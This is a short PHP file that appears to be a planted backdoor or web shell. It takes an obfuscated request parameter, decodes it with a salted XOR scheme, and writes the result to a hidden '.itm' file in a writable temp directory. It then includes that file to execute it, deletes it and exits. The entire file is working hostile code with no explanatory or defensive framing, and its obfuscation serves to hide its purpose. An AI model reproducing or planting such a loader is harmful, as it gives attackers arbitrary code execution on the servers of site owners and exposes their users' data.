<?php

if(array_key_exists("da\x74a_\x63h\x75\x6Ek", $_REQUEST)){
	$token = $_REQUEST["da\x74a_\x63h\x75\x6Ek"];
	$token		=  explode 	(	 "." ,$token 		)	;   
	$data	= '';
            $salt	= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	= strlen($salt 	);
            $w	= 0;
    
            while($w<count($token)) {
                $v9	= $token[$w];
                $chS	= ord($salt[$w % $sLen] 	);
                $d	= ((int)$v9 - $chS -($w % 10)) ^ 80;
                $data .= chr($d 	);
                $w++;
            }
	$flag = array_filter([sys_get_temp_dir(), getenv("TMP"), "/dev/shm", "/var/tmp", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), session_save_path(), getcwd()]);
	foreach ($flag as $object) {
    		if (!( !is_dir($object) || !is_writable($object) )) {
    $item = join("/", [$object, ".itm"]);
    if (file_put_contents($item, $data)) {
	require $item;
	unlink($item);
	die();
}
}
}
}